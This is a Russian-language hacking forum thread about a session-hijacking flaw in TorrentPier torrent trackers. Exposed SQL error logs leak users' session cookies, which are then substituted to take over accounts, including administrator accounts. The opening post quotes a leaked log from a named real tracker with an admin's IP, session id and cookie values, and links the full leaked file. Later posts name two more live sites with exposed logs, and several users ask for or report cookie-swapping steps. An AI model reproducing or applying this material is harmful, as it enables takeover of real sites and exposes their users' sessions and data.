Данная Уязвимость позволяет получить доступ к практически любой учетной записи пользователя. Суть: Подмена Cookie Информации Опасность: ВЫСОКАЯ Уязвимость находится в данном файле http://Имя_Хоста/forum/log/sql_error_bb.log Вот фрагмент файла, взятого с известного трекера http://pirat.ca/ Code: Source : includes/functions_group.php(220) IP : 78.37.2.16 Date : 2009-12-17 14:32:14 Agent : Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729) Req_URI : /forum/admin/admin_forums.php Referer : http://pirat.ca/forum/admin/admin_forums.php?mode=deleteforum&f=679 Method : POST PID : 27739 Request : Array ( [mode] => movedelforum [from_id] => 679 [sid] => 6JqZF1CwFgqsJfJwTlRH [to_id] => -1 [submit] => Перенести и удалить [bb_data] => a:3:{s:2:"uk";s:12:"OdlHLUTBfjm0";s:3:"uid";i:80;s:3:"sid";s:20:"6JqZF1CwFgqsJfJwTlRH";} [bb_t] => a:2:{i:49976;i:1261047727;i:50621;i:1261032130;} [__utma] => 6183090.301573379111072060.1247143023.1261024234.1261048248.89 [__utmz] => 6183090.1247143023.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) [MG_735] => 12 [MG_2719] => 12 [MG_8419] => 12 [hotlog] => 1 [__utmb] => 6183090.32.10.1261048248 [__utmc] => 6183090 )______________________________________________________________________________ Из этого лога нам интересны следующие данные: Referer: Как мы видим, по это один из модераторов или администраторов трекера, судя по ссылке. [bb_data] Это содержимое cookie файла жертвы. Подмен данных, и вот мы уже члены администрации) Ниже предоставляю оригинал файла, слитый 2 дня назад. На сегодняшний день, они додумались заблокировать каталог)) http://www.bmail.ru/[email protected]/sql_error_bb%20(1).log.7z
Как искать этот TorrentPier ? Весь сайт облазил - никаких копирайтов типа "Powered by TorrentPier" не нашел. Кстати, чет знакомая штука Code: [bb_data] => a:3:{s:2:"uk";s:12:"OdlHLUTBfjm0";s:3:"uid";i:80;s:3:"sid";s:20:"6JqZF1CwFgqsJfJwTlRH";} [bb_t] => a:2:{i:49976;i:1261047727;i:50621;i:1261032130;} [__utma] => 6183090.301573379111072060.1247143023.1261024234.1 261048248.89 [__utmz] => 6183090.1247143023.1.1.utmcsr=(direct)|utmccn=(dir ect)|utmcmd=(none) Это случаем не MyBB Форум, или я его с чемто путаю??? ЗЫ: + за уязвимость ЗЗЫ: Кстати добавь еще Опасность: ВЫСОКАЯ
Не за что Кстати укажи версию TorrentPier еще. Тока чет мне кажется что это уязвимость форума а не самого торрент трекера. Мы же доступ в админку форума получаем, я правильно понял???
ещё пара http://pravtor.spb.ru/forum/log/sql_error_bb.log http://torrent.dn.ua/forum/log/sql_error_bb.log
Если вакханалия будет продолжаться я закрою тему и всем нахерачу минусов Я уже устал её чистить =\ Кто не знает что с этим делать, просто идёт читать статьи. Никаких объяснений тут не требуется, всё и так предельно ясно, и дисскуссии на тему Чем Что и Куда вставлять что-бы было хорошо тут развивать ненадо
объясните плиз поподробней, что именно подменить з.ы. нашел лог файл>нашел [bb_data] => a:3:{s:2:"uk";s:12:"1JV3pt8x5CdJ";s:3:"uid";i:2;s:3:"sid";s:20:"TQ0djqtKwZ7m5hjBx4OH";} но что именно из этих строк брать?
решил поднять тему, на локальном трекере получилось вытянуть куки Code: a:3:{s:2:"uk";s:12:"JjLVh14d14eJ";s:3:"uid";i:135;s:3:"sid";s:20:"uOq4i4D1L1fhbamyrEj9";} хотел поменять на свои, только вот у меня куки по другому отображаются (во всех браузерах) Code: a%3A3%3A%7Bs%3A2%3A%22uk%22%3BN%3Bs%3A3%3A%22uid%22%3Bi%3A290%3Bs%3A3%3A%22sid%22%3Bs%3A20%3A%22i5SO4LOLdxKIx7J53gIf%22%3B%7D подскажите плиз как привести в нормальный вид их?
спасибо, перевел, получилось Code: a:3:{s:2:"uk";N;s:3:"uid";i:290;s:3:"sid";s:20:"i5SO4LOLdxKIx7J53gIf";} в исходном коде поменял куки админа на эти, нажал применить, но при обновлении страницы я все равно на своем профиле что я делаю не так? объясните плиз PS. сам разобрался
подскажите как попасть в админку cookies прошли, сайт видит меня как админ, но в админку не пускает, просит ввести пароль
